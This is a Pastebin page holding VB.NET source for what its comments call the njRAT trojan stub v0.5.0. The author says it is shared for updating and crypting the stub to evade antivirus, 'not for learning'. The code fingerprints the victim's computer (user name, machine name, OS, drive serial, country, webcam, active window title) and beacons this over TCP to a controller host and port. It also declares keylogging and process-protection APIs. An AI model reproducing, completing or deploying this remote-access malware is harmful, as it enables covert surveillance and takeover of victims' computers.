API tools faq
paste
Advertisement
SecurityNajaf

#IL_Code 8920

SecurityNajaf
Jan 28th, 2014
114
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 14.13 KB | None | 0 0
raw download clone embed print report
  1. Imports System.Collections.Generic
  2. Imports System.Threading
  3. Imports System.IO.Compression
  4. Imports System.Diagnostics
  5. Imports System.Runtime.InteropServices
  6. Imports System.Drawing
  7. Imports System.Windows.Forms
  8. ' njrat STUB v0.5.0
  9. ' by njq8
  10. ' i Give you This SRC TO Let you Update/Crypt stub.exe Not For Learning or Something
  11. ' some codes here writed in "WRONG Way" To Bypass Av (:
  12. ' if you want good way for crypting .. just add random Codes at EveryMethod And Randomize[Fields/Methods]
  13. ' Last Edit: 2012/11/11
  14. Public Class A
  15.     Public F As Object = New Microsoft.VisualBasic.Devices.Computer
  16.  
  17. #Region "Settings"
  18.     ' dont change anything here only you can Change Version "0.5.0" if you want njrat Builder Work With No Problems
  19.     Public VN As String = "%vn%" ' base64 encoded Victim Name
  20.     Public VR As String = "0.5.0E" ' Version
  21.     Public H As String = "127.0.0.1" ' Host
  22.     Public P As String = "1199" ' PORT
  23.     Public Y As String = "|'|'|" ' Dont Change This<<
  24. #End Region
  25.     Sub WL()
  26.  
  27.     End Sub
  28. #Region "Functions"
  29.  
  30.     Function GTV(ByVal n As String) As String ' Get value in my Registry Key RG
  31.         Try
  32.             Return F.Registry.CurrentUser.CreateSubKey("Software\").GetValue(n, "")
  33.         Catch ex As Exception
  34.             Return ""
  35.         End Try
  36.     End Function
  37.     Function STV(ByVal n As String, ByVal t As String) ' set value in my Registry Key RG
  38.         Try
  39.             F.Registry.CurrentUser.CreateSubKey("Software\").SetValue(n, t)
  40.             Return True
  41.         Catch ex As Exception
  42.             Return False
  43.         End Try
  44.     End Function
  45.     Function inf() As String
  46.         Dim s As String = "lv" & Y
  47.         ' Victim name
  48.         Try
  49.             If GTV("vn") = "" Then
  50.                 s += ENB(DEB(VN) & "_" & HWD()) & Y
  51.             Else
  52.                 s += ENB(DEB(GTV("vn")) & "_" & HWD()) & Y
  53.             End If
  54.         Catch ex As Exception
  55.             s &= ENB(HWD()) & Y
  56.         End Try
  57.         ' PC
  58.         Try
  59.             s += Environment.MachineName & Y
  60.         Catch ex As Exception
  61.             s += "??" & Y
  62.         End Try
  63.         ' username
  64.         Try
  65.             s += Environment.UserName & Y
  66.         Catch ex As Exception
  67.             s += "??" & Y
  68.         End Try
  69.         ' install date
  70.  
  71.         s += FR() & Y
  72.         ' Country
  73.         Try
  74.             s += Gcc(&H7) & Y
  75.         Catch ex As Exception
  76.             s += "X" & Y
  77.         End Try
  78.         ' OS
  79.         Try
  80.             s += F.Info.OSFullName.Replace("Microsoft", "").Replace("Windows", "Win").Replace("®", "").Replace("™", "").Replace("  ", " ").Replace(" Win", "Win")
  81.         Catch ex As Exception
  82.             s += "??" '& Y
  83.         End Try
  84.         s += "SP"
  85.         Try
  86.             Dim k As String() = Split(Environment.OSVersion.ServicePack, " ")
  87.             If k.Length = 1 Then
  88.                 s &= "0"
  89.             End If
  90.             s &= k(k.Length - 1)
  91.         Catch ex As Exception
  92.             s &= "0"
  93.         End Try
  94.         Try
  95.             If Environment.GetFolderPath(38).Contains("x86") Then
  96.                 s += " x64" & Y
  97.             Else
  98.                 s += " x86" & Y
  99.             End If
  100.         Catch ex As Exception
  101.             s += Y
  102.         End Try
  103.         ' Cam
  104.         If Cam() = True Then
  105.             s += "Yes" & Y
  106.         Else
  107.             s += "No" & Y
  108.         End If
  109.         ' Version
  110.         s += VR & Y
  111.         ' ping
  112.         s += ".." & Y
  113.         ' active window
  114.         s += ACT() & Y
  115.         Dim x As String = ""
  116.         Try ' plugin list..
  117.             For Each xx As String In F.Registry.CurrentUser.CreateSubKey("Software\", False).GetValueNames
  118.                 If xx.Length = 32 Then
  119.                     x &= xx & ","
  120.                 End If
  121.             Next
  122.         Catch ex As Exception
  123.         End Try
  124.         Return s & x
  125.     End Function
  126.     Public Function FR() As String ' install Date
  127.         Try
  128.             Return CType(LO, IO.FileInfo).LastWriteTime.ToString("yyyy-MM-dd")
  129.         Catch ex As Exception
  130.             Return "unknown"
  131.         End Try
  132.     End Function
  133.     Public Function ENB(ByRef s As String) As String ' Encode base64
  134.         Dim byt As Byte() = System.Text.Encoding.UTF8.GetBytes(s)
  135.         ENB = Convert.ToBase64String(byt)
  136.     End Function
  137.     Public Function DEB(ByRef s As String) As String ' Decode Base64
  138.         Dim b As Byte() = Convert.FromBase64String(s)
  139.         DEB = System.Text.Encoding.UTF8.GetString(b)
  140.     End Function
  141.  
  142.     Public Function SB(ByRef S As String) As Byte() ' String To Bytes
  143.         Return System.Text.Encoding.Default.GetBytes(S)
  144.     End Function
  145.     Public Function BS(ByRef B As Byte()) As String ' Byets To String
  146.         Return System.Text.Encoding.Default.GetString(B)
  147.     End Function
  148.     Public SPL As String = "[endof]"
  149.     Function fx(ByVal b As Byte(), ByVal spl As String) As Array
  150.         ' splites Bytes By Word
  151.         Dim a As Object = New List(Of Byte())
  152.         Dim M As Object = New IO.MemoryStream
  153.         Dim MM As Object = New IO.MemoryStream
  154.         Dim T As String() = Split(BS(b), spl)
  155.         M.Write(b, 0, T(0).Length)
  156.         MM.Write(b, T(0).Length + spl.Length, b.Length - (T(0).Length + spl.Length))
  157.         a.Add(M.ToArray)
  158.         a.Add(MM.ToArray)
  159.         M.Dispose()
  160.         MM.Dispose()
  161.         Return a.ToArray
  162.     End Function
  163.     Public Function ZIP(ByVal B() As Byte, ByRef CM As Boolean) As Byte()
  164.         ' compress Bytes With GZIP
  165.         If CM = True Then
  166.             Dim M As Object = New IO.MemoryStream()
  167.             Dim gZip As Object = New IO.Compression.GZipStream(M, CompressionMode.Compress, True)
  168.             gZip.Write(B, 0, B.Length)
  169.             gZip.Dispose()
  170.             M.Position = 0
  171.             Dim BF(M.Length) As Byte
  172.             M.Read(BF, 0, BF.Length)
  173.             M.Dispose()
  174.             Return BF
  175.         Else
  176.             Dim M As Object = New IO.MemoryStream(B)
  177.             Dim gZip As Object = New GZipStream(M, CompressionMode.Decompress)
  178.             Dim buffer(3) As Byte
  179.             M.Position = M.Length - 5
  180.             M.Read(buffer, 0, 4)
  181.             Dim size As Integer = BitConverter.ToInt32(buffer, 0)
  182.             M.Position = 0
  183.             Dim BF(size - 1) As Byte
  184.             gZip.Read(BF, 0, size)
  185.             gZip.Dispose()
  186.             M.Dispose()
  187.             Return BF
  188.         End If
  189.     End Function
  190. #End Region
  191. #Region "API"
  192.     <DllImport("psapi")> _
  193.     Public Shared Function EmptyWorkingSet(ByVal hProcess As Long) As Boolean
  194.     End Function
  195.     '======== process protect With BSOD
  196.     <DllImport("ntdll")> _
  197.     Private Shared Function NtSetInformationProcess(ByVal hProcess As IntPtr, ByVal processInformationClass As Integer, ByRef processInformation As Integer, ByVal processInformationLength As Integer) As Integer
  198.     End Function
  199.     '=============================== Cam Drivers
  200.     Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, _
  201.     ByVal lpszName As String, ByVal cbName As Integer, ByVal lpszVer As String, _
  202.     ByVal cbVer As Integer) As Boolean
  203.     Public Function Cam() As Boolean
  204.         Try
  205.             Dim d As String = Space(100)
  206.             For i As Integer = 0 To 4
  207.                 If capGetDriverDescriptionA(i, d, 100, Nothing, 100) Then
  208.                     Return True
  209.                 End If
  210.             Next
  211.         Catch ex As Exception
  212.         End Try
  213.         Return False
  214.     End Function
  215.     '=============================== PC Country
  216.     <DllImport("kernel32.dll")> _
  217.     Private Shared Function GetLocaleInfo(ByVal Locale As UInteger, ByVal LCType As UInteger, <Out()> ByVal lpLCData As System.Text.StringBuilder, ByVal cchData As Integer) As Integer
  218.     End Function
  219.     Public Function Gcc(ByVal i As UInteger) As String
  220.         Try
  221.             Dim lpLCData = New System.Text.StringBuilder(256)
  222.             Dim ret As Integer = GetLocaleInfo(&H400, i, lpLCData, lpLCData.Capacity)
  223.             If ret > 0 Then
  224.                 Return lpLCData.ToString().Substring(0, ret - 1)
  225.             End If
  226.         Catch ex As Exception
  227.         End Try
  228.         Return "X"
  229.     End Function
  230.     '====================================== Window API
  231.  
  232.     Public Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hWnd As IntPtr, ByVal WinTitle As String, ByVal MaxLength As Integer) As Integer
  233.     Public Declare Function GetWindowTextLength Lib "user32.dll" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Integer
  234.     Public Function ACT() As String ' Get Active Window Text
  235.         Try
  236.             Dim h As IntPtr = GetForegroundWindow()
  237.             If h = IntPtr.Zero Then
  238.                 Return ENB(" ")
  239.                 Exit Function
  240.             End If
  241.             Dim t As Integer
  242.             t = GetWindowTextLength(h)
  243.             Dim w As String = StrDup(t + 1, "*")
  244.             GetWindowText(h, w, t + 1)
  245.             Dim pid As Integer
  246.             GetWindowThreadProcessId(h, pid)
  247.             If pid = 0 Then
  248.                 Return ENB(w)
  249.             Else
  250.                 Try
  251.                     Return ENB(Diagnostics.Process.GetProcessById(pid).MainWindowTitle())
  252.                 Catch ex As Exception
  253.                     Return ENB(w)
  254.                 End Try
  255.             End If
  256.         Catch ex As Exception
  257.             Return ENB(" ")
  258.         End Try
  259.     End Function
  260.     '=================== Get Drive Serial
  261.     Private Declare Function GetVolumeInformation Lib "kernel32" Alias "GetVolumeInformationA" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nVolumeNameSize As Integer, ByRef lpVolumeSerialNumber As Integer, ByRef lpMaximumComponentLength As Integer, ByRef lpFileSystemFlags As Integer, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Integer) As Integer
  262.     Function HWD() As String
  263.         Try
  264.             Dim sn As Integer
  265.             GetVolumeInformation(Environ("SystemDrive") & "\", Nothing, Nothing, sn, 0, 0, Nothing, Nothing)
  266.             Return (Hex(sn))
  267.         Catch ex As Exception
  268.             Return "ERR"
  269.         End Try
  270.     End Function
  271. #End Region
  272.  
  273.  
  274.     Public LO As Object = New IO.FileInfo(Application.ExecutablePath)
  275.  
  276.  
  277.     Public Cn As Boolean = False
  278.     Public C As Object = Nothing
  279.  
  280.     Public Sub Send(ByVal b As Byte())
  281.         If Cn = False Then Exit Sub
  282.         Try
  283.             Dim r As Object = New IO.MemoryStream
  284.             r.Write(b, 0, b.Length)
  285.             r.Write(SB(SPL), 0, SPL.Length)
  286.             C.Client.Send(r.ToArray, 0, r.Length, Net.Sockets.SocketFlags.None)
  287.             r.Dispose()
  288.         Catch ex As Exception
  289.             Cn = False
  290.         End Try
  291.     End Sub
  292.     Public Sub Send(ByVal S As String)
  293.         Send(SB(S))
  294.     End Sub
  295.     Sub RC()
  296.         Dim M As Object = New IO.MemoryStream ' create memory stream
  297.         Dim lp As Integer = 0
  298. re:
  299.         Try
  300.             If C Is Nothing Then GoTo e
  301.             If C.Client.Connected = False Then GoTo e
  302.             If Cn = False Then GoTo e
  303.             lp += 1
  304.  
  305.             If lp > 500 Then
  306.                 lp = 0
  307.                 ' check if i am still connected
  308.                 If C.Client.Poll(-1, Net.Sockets.SelectMode.SelectRead) And C.Client.Available <= 0 Then GoTo e
  309.             End If
  310.             If C.Available > 0 Then
  311.                 Dim B(C.Available - 1) As Byte
  312.                 C.Client.Receive(B, 0, B.Length, Net.Sockets.SocketFlags.None)
  313.                 M.Write(B, 0, B.Length)
  314. rr:
  315.                 If BS(M.ToArray).Contains(SPL) Then ' split packet..
  316.                     Dim A As Array = fx(M.ToArray, SPL)
  317.                  
  318.                     M.Dispose()
  319.                     M = New IO.MemoryStream
  320.                     If A.Length = 2 Then
  321.                         M.Write(A(1), 0, A(1).length)
  322.                         GoTo rr
  323.                     End If
  324.                 End If
  325.             End If
  326.         Catch ex As Exception
  327.             GoTo e
  328.         End Try
  329.         GoTo re
  330. e:
  331.         Cn = False
  332.         Try
  333.             C.Client.Disconnect(False)
  334.         Catch ex As Exception
  335.         End Try
  336.         Try
  337.             M.Dispose()
  338.         Catch ex As Exception
  339.         End Try
  340.         M = New IO.MemoryStream
  341.         Try
  342.             C = New Net.Sockets.TcpClient
  343.             C.ReceiveTimeout = -1
  344.             C.SendTimeout = -1
  345.             C.SendBufferSize = 999999
  346.             C.ReceiveBufferSize = 999999
  347.             C.Client.SendBufferSize = 999999
  348.             C.Client.ReceiveBufferSize = 999999
  349.             lp = 0
  350.             C.Client.Connect(H, P)
  351.             Cn = True
  352.             Send(inf)
  353.             Try
  354.                 If GTV("us") = "!" Then
  355.                     Send("us")
  356.                 End If
  357.             Catch ex As Exception
  358.                 Cn = False
  359.             End Try
  360.         Catch ex As Exception
  361.             GoTo e
  362.         End Try
  363.         GoTo re
  364.     End Sub
  365.  
  366.  
  367.  
  368. #Region "API"
  369.     <DllImport("user32.dll")> _
  370.     Private Shared Function ToUnicodeEx(ByVal wVirtKey As UInteger, ByVal wScanCode As UInteger, ByVal lpKeyState As Byte(), <Out(), MarshalAs(UnmanagedType.LPWStr)> ByVal pwszBuff As System.Text.StringBuilder, ByVal cchBuff As Integer, ByVal wFlags As UInteger, _
  371.   ByVal dwhkl As IntPtr) As Integer
  372.     End Function
  373.     <DllImport("user32.dll")> _
  374.     Private Shared Function GetKeyboardState(ByVal lpKeyState As Byte()) As Boolean
  375.     End Function
  376.     <DllImport("user32.dll")> _
  377.     Private Shared Function MapVirtualKey(ByVal uCode As UInteger, ByVal uMapType As UInteger) As UInteger
  378.     End Function
  379.     Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As IntPtr, ByRef lpdwProcessID As Integer) As Integer
  380.     Private Declare Function GetKeyboardLayout Lib "user32" (ByVal dwLayout As Integer) As Integer
  381.     Private Declare Function GetForegroundWindow Lib "user32" () As IntPtr
  382.     Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Short
  383. #End Region
  384.  
  385.     Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
  386.         Timer1.Start()
  387.     End Sub
  388.  
  389.     Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
  390.         RC()
  391.     End Sub
  392. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!